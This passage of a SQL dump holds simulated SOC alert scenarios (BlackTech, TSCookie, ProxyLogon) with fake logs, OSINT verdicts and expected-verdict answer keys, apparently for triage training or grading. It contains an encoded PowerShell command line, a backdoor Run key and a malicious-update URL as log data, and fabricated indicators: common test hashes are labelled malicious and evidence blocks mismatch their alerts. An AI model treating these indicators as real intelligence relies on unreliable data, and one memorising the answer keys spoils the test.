4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T15:27:32Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"src_ip\\\":\\\"192.168.1.101\\\",\\\"dst_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"sensitive_data_backup.zip\\\",\\\"file_hash\\\":\\\"9f1c2e5b6f3a4b8a9d2f7cba6c8e5d4f\\\",\\\"bytes_sent\\\":104857600,\\\"exfiltration_channel\\\":\\\"encrypted_tunnel\\\",\\\"detection_method\\\":\\\"anomaly_detection_engine\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1182, 'Suspicious Firmware Update Detected', 'high', 'Network IDS/IPS logs', 'A suspicious firmware update was detected targeting a router. The update was initiated from an external IP address associated with the BlackTech APT group. The malicious firmware was identified by its hash, indicating it was designed to exploit vulnerabilities in Japanese and Taiwanese network devices.', 'Initial Access', 'T1190 - Exploit Public-Facing Application', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-04T02:15:36Z\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.10\",\"event\":\"Malicious firmware update attempt\",\"firmware_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"firmware_filename\":\"router_update_v2.bin\",\"detected_by\":\"Network IDS\",\"protocol\":\"HTTP\",\"request_url\":\"http://malicious-update.com/router_update_v2.bin\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\"}', '2026-02-07 21:22:16', '2026-02-22 15:04:00', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"Known IP for BlackTech APT activities\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Hash Registry\",\"verdict\":\"malicious\",\"details\":\"Associated with malicious firmware targeting routers\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-update.com/router_update_v2.bin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"URL hosting malicious firmware update\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1183, 'TSCookie Malware Execution Identified', 'high', 'Endpoint Detection and Response (EDR) logs', 'The TSCookie malware has been executed on an endpoint, potentially allowing the attacker to deploy malicious scripts and deepen infiltration into the network.', 'Execution', 'T1203 - Exploitation for Client Execution', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-14T08:45:23Z\",\"event_id\":\"4624\",\"user\":\"jdoe\",\"source_ip\":\"185.234.217.211\",\"destination_ip\":\"10.0.0.15\",\"process_name\":\"C:\\\\Windows\\\\System32\\\\wscript.exe\",\"file_name\":\"TSCookieLoader.js\",\"file_hash\":\"3f6e5b7a8b9c3d4e5f6a7b8c9d0e1f2a\",\"action\":\"execute\",\"status\":\"success\"}', '2026-02-07 21:22:16', '2026-02-22 20:41:35', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.234.217.211\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with multiple malware campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised endpoint.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"TSCookieLoader.js\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareBazaar\",\"verdict\":\"malicious\",\"details\":\"JavaScript file associated with TSCookie malware.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3f6e5b7a8b9c3d4e5f6a7b8c9d0e1f2a\",\"is_critical\":true,\"osint_result\":{\"source\":\"HashLookup\",\"verdict\":\"malicious\",\"details\":\"File hash linked to TSCookie malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1184, 'Persistence Mechanism Activated', 'high', 'System configuration logs', 'BlackTech has modified critical system configurations to maintain persistent access. A backdoor was embedded to withstand potential system reboots or updates.', 'Persistence', 'T1547: Boot or Logon Autostart Execution', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T10:23:45Z\",\"event_id\":\"4625\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"10.0.25.5\",\"user\":\"jdoe_admin\",\"action\":\"Registry Key Modification\",\"registry_key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Backdoor\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"filename\":\"backdoor.exe\",\"event_status\":\"Success\"}', '2026-02-07 21:22:16', '2026-02-23 11:11:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with BlackTech APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.25.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected machine.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe_admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User account with recent unusual activity.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Malware hash associated with backdoor functionality.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"backdoor.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Executable known to be used in persistence mechanisms by BlackTech.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:02.491Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T10:23:45Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.25.5\\\",\\\"user\\\":\\\"jdoe_admin\\\",\\\"action\\\":\\\"Registry Key Modification\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\Backdoor\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"filename\\\":\\\"backdoor.exe\\\",\\\"event_status\\\":\\\"Success\\\"}\"},{\"timestamp\":\"2026-02-08T18:59:02.491Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T10:23:45Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.25.5\\\",\\\"user\\\":\\\"jdoe_admin\\\",\\\"action\\\":\\\"Registry Key Modification\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\Backdoor\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"filename\\\":\\\"backdoor.exe\\\",\\\"event_status\\\":\\\"Success\\\"}\"},{\"timestamp\":\"2026-02-08T18:58:02.491Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T10:23:45Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.25.5\\\",\\\"user\\\":\\\"jdoe_admin\\\",\\\"action\\\":\\\"Registry Key Modification\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\Backdoor\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"filename\\\":\\\"backdoor.exe\\\",\\\"event_status\\\":\\\"Success\\\"}\"},{\"timestamp\":\"2026-02-08T18:57:02.491Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T10:23:45Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.25.5\\\",\\\"user\\\":\\\"jdoe_admin\\\",\\\"action\\\":\\\"Registry Key Modification\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\Backdoor\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"filename\\\":\\\"backdoor.exe\\\",\\\"event_status\\\":\\\"Success\\\"}\"},{\"timestamp\":\"2026-02-08T18:56:02.491Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T10:23:45Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.25.5\\\",\\\"user\\\":\\\"jdoe_admin\\\",\\\"action\\\":\\\"Registry Key Modification\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\Backdoor\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"filename\\\":\\\"backdoor.exe\\\",\\\"event_status\\\":\\\"Success\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1185, 'Unauthorized Lateral Movement Detected', 'high', 'Lateral movement detection tool', 'BlackTech is utilizing stolen credentials and network mapping to move laterally across the compromised network. They aim to expand their control and access restricted areas.', 'Lateral Movement', 'T1078 - Valid Accounts', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T10:23:45Z\",\"event_id\":\"LM123456\",\"source_ip\":\"185.92.220.25\",\"destination_ip\":\"10.5.16.7\",\"source_user\":\"jdoe\",\"destination_user\":\"admin\",\"used_credentials\":\"jdoe@corporate.local\",\"network_protocol\":\"SMB\",\"operation\":\"access\",\"file_accessed\":\"\\\\\\\\10.5.16.7\\\\sensitive_share\\\\confidential.docx\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"tools_used\":[\"PsExec.exe\"],\"notes\":\"Suspicious lateral movement detected. PsExec used to access sensitive share.\"}', '2026-02-07 21:22:16', '2026-02-22 20:46:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.92.220.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with BlackTech APT.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.5.16.7\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal server being accessed.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"User credentials potentially compromised.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"PsExec.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"PsExec is commonly used for lateral movement.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:02.493Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T10:23:45Z\\\",\\\"event_id\\\":\\\"LM123456\\\",\\\"source_ip\\\":\\\"185.92.220.25\\\",\\\"destination_ip\\\":\\\"10.5.16.7\\\",\\\"source_user\\\":\\\"jdoe\\\",\\\"destination_user\\\":\\\"admin\\\",\\\"used_credentials\\\":\\\"jdoe@corporate.local\\\",\\\"network_protocol\\\":\\\"SMB\\\",\\\"operation\\\":\\\"access\\\",\\\"file_accessed\\\":\\\"\\\\\\\\\\\\\\\\10.5.16.7\\\\\\\\sensitive_share\\\\\\\\confidential.docx\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"tools_used\\\":[\\\"PsExec.exe\\\"],\\\"notes\\\":\\\"Suspicious lateral movement detected. PsExec used to access sensitive share.\\\"}\"},{\"timestamp\":\"2026-02-08T18:59:02.493Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T10:23:45Z\\\",\\\"event_id\\\":\\\"LM123456\\\",\\\"source_ip\\\":\\\"185.92.220.25\\\",\\\"destination_ip\\\":\\\"10.5.16.7\\\",\\\"source_user\\\":\\\"jdoe\\\",\\\"destination_user\\\":\\\"admin\\\",\\\"used_credentials\\\":\\\"jdoe@corporate.local\\\",\\\"network_protocol\\\":\\\"SMB\\\",\\\"operation\\\":\\\"access\\\",\\\"file_accessed\\\":\\\"\\\\\\\\\\\\\\\\10.5.16.7\\\\\\\\sensitive_share\\\\\\\\confidential.docx\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"tools_used\\\":[\\\"PsExec.exe\\\"],\\\"notes\\\":\\\"Suspicious lateral movement detected. PsExec used to access sensitive share.\\\"}\"},{\"timestamp\":\"2026-02-08T18:58:02.493Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T10:23:45Z\\\",\\\"event_id\\\":\\\"LM123456\\\",\\\"source_ip\\\":\\\"185.92.220.25\\\",\\\"destination_ip\\\":\\\"10.5.16.7\\\",\\\"source_user\\\":\\\"jdoe\\\",\\\"destination_user\\\":\\\"admin\\\",\\\"used_credentials\\\":\\\"jdoe@corporate.local\\\",\\\"network_protocol\\\":\\\"SMB\\\",\\\"operation\\\":\\\"access\\\",\\\"file_accessed\\\":\\\"\\\\\\\\\\\\\\\\10.5.16.7\\\\\\\\sensitive_share\\\\\\\\confidential.docx\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"tools_used\\\":[\\\"PsExec.exe\\\"],\\\"notes\\\":\\\"Suspicious lateral movement detected. PsExec used to access sensitive share.\\\"}\"},{\"timestamp\":\"2026-02-08T18:57:02.493Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T10:23:45Z\\\",\\\"event_id\\\":\\\"LM123456\\\",\\\"source_ip\\\":\\\"185.92.220.25\\\",\\\"destination_ip\\\":\\\"10.5.16.7\\\",\\\"source_user\\\":\\\"jdoe\\\",\\\"destination_user\\\":\\\"admin\\\",\\\"used_credentials\\\":\\\"jdoe@corporate.local\\\",\\\"network_protocol\\\":\\\"SMB\\\",\\\"operation\\\":\\\"access\\\",\\\"file_accessed\\\":\\\"\\\\\\\\\\\\\\\\10.5.16.7\\\\\\\\sensitive_share\\\\\\\\confidential.docx\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"tools_used\\\":[\\\"PsExec.exe\\\"],\\\"notes\\\":\\\"Suspicious lateral movement detected. PsExec used to access sensitive share.\\\"}\"},{\"timestamp\":\"2026-02-08T18:56:02.493Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T10:23:45Z\\\",\\\"event_id\\\":\\\"LM123456\\\",\\\"source_ip\\\":\\\"185.92.220.25\\\",\\\"destination_ip\\\":\\\"10.5.16.7\\\",\\\"source_user\\\":\\\"jdoe\\\",\\\"destination_user\\\":\\\"admin\\\",\\\"used_credentials\\\":\\\"jdoe@corporate.local\\\",\\\"network_protocol\\\":\\\"SMB\\\",\\\"operation\\\":\\\"access\\\",\\\"file_accessed\\\":\\\"\\\\\\\\\\\\\\\\10.5.16.7\\\\\\\\sensitive_share\\\\\\\\confidential.docx\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"tools_used\\\":[\\\"PsExec.exe\\\"],\\\"notes\\\":\\\"Suspicious lateral movement detected. PsExec used to access sensitive share.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1186, 'Data Exfiltration Attempt Discovered', 'high', 'Data Loss Prevention (DLP) tool', 'In the final stage of their operation, BlackTech attempts to exfiltrate valuable data, including intellectual property and confidential communications, signaling the culmination of their espionage activities. The DLP tool detected abnormal data transfer attempts towards an external IP address associated with known threat actors.', 'Exfiltration', 'T1041 - Exfiltration Over C2 Channel', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:35:23Z\",\"event_id\":\"DLPEX1234567\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"203.0.113.45\",\"user\":\"jdoe\",\"filename\":\"confidential_strategy.docx\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"protocol\":\"HTTPS\",\"action\":\"blocked\",\"reason\":\"Data exfiltration attempt detected\",\"external_ip_reputation\":\"malicious\"}', '2026-02-07 21:22:16', '2026-02-22 20:43:41', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal network IP\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Associated with known threat actor BlackTech\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"confidential_strategy.docx\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_documentation\",\"verdict\":\"suspicious\",\"details\":\"Sensitive internal document\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_reputation_service\",\"verdict\":\"suspicious\",\"details\":\"Document hash not recognized in safe database\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"user_directory\",\"verdict\":\"clean\",\"details\":\"Valid user account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:02.496Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:35:23Z\\\",\\\"event_id\\\":\\\"DLPEX1234567\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_strategy.docx\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"blocked\\\",\\\"reason\\\":\\\"Data exfiltration attempt detected\\\",\\\"external_ip_reputation\\\":\\\"malicious\\\"}\"},{\"timestamp\":\"2026-02-08T18:59:02.496Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:35:23Z\\\",\\\"event_id\\\":\\\"DLPEX1234567\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_strategy.docx\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"blocked\\\",\\\"reason\\\":\\\"Data exfiltration attempt detected\\\",\\\"external_ip_reputation\\\":\\\"malicious\\\"}\"},{\"timestamp\":\"2026-02-08T18:58:02.496Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:35:23Z\\\",\\\"event_id\\\":\\\"DLPEX1234567\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_strategy.docx\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"blocked\\\",\\\"reason\\\":\\\"Data exfiltration attempt detected\\\",\\\"external_ip_reputation\\\":\\\"malicious\\\"}\"},{\"timestamp\":\"2026-02-08T18:57:02.496Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:35:23Z\\\",\\\"event_id\\\":\\\"DLPEX1234567\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_strategy.docx\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"blocked\\\",\\\"reason\\\":\\\"Data exfiltration attempt detected\\\",\\\"external_ip_reputation\\\":\\\"malicious\\\"}\"},{\"timestamp\":\"2026-02-08T18:56:02.496Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:35:23Z\\\",\\\"event_id\\\":\\\"DLPEX1234567\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_strategy.docx\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"blocked\\\",\\\"reason\\\":\\\"Data exfiltration attempt detected\\\",\\\"external_ip_reputation\\\":\\\"malicious\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1187, 'Initial Access via ProxyLogon Exploit', 'critical', 'Network Intrusion Detection System (NIDS)', 'The Calypso APT group has exploited an unpatched ProxyLogon vulnerability in order to gain initial access to government email servers. This activity was detected by the NIDS as the group initiated exploitation attempts from a known malicious IP address, aiming to establish a foothold for further intrusion.', 'Exploitation', 'T1190 - Exploit Public-Facing Application', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-11T14:32:45Z\",\"event_type\":\"exploitation_attempt\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"destination_port\":443,\"exploit\":\"ProxyLogon\",\"malware_hash\":\"3d2e478f323a7b0f2b9f5a6d7e8f9c10\",\"associated_filename\":\"malicious_payload.exe\",\"target_user\":\"admin@governmentagency.gov\",\"protocol\":\"HTTPS\",\"nids_rule_id\":\"1001\"}', '2026-02-07 21:23:06', '2026-02-15 04:19:07', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intel Service\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple APT campaigns, including ProxyLogon exploitation.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Assets\",\"verdict\":\"internal\",\"details\":\"Internal government email server.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3d2e478f323a7b0f2b9f5a6d7e8f9c10\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malicious payload used by 